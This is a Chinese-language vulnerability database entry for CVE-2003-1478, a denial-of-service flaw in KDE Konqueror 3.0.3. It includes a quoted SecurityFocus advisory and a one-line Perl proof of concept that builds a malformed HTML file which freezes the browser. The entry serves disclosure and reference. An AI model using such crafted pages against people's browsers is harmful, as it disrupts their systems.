KDE Konqueror畸形HTML页服务拒绝漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107300 漏洞类型 缓冲区溢出
发布时间 2003-05-02 更新时间 2003-12-31
CVE编号 CVE-2003-1478 CNNVD-ID CNNVD-200312-342
漏洞平台 Linux CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/22560
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-342
|漏洞详情
KDE3.0.3版本的Konqueror存在漏洞。远程攻击者可以借助以"xFFxFE"字节序列和大量CRLF序列开头的网页导致服务拒绝(存储器内容更新),正如使用freeze.htm。
|漏洞EXP
source: http://www.securityfocus.com/bid/7486/info

KDE Konqueror has been reported prone to a denial of service vulnerability when rendering a HTML page that contains malformed data.

Although unconfirmed, code execution may be possible.

The precise technical details of this vulnerability are currently unknown. This BID will be updated, as further information is available. 

perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm
|参考资料

来源:XF
名称:kde-konqueror-dos(11971)
链接:http://xforce.iss.net/xforce/xfdb/11971
来源:BID
名称:7486
链接:http://www.securityfocus.com/bid/7486
来源:BUGTRAQ
名称:20030502Re:AprilappearedtobeamonthofIEbugs.Here
链接:http://www.securityfocus.com/archive/1/320266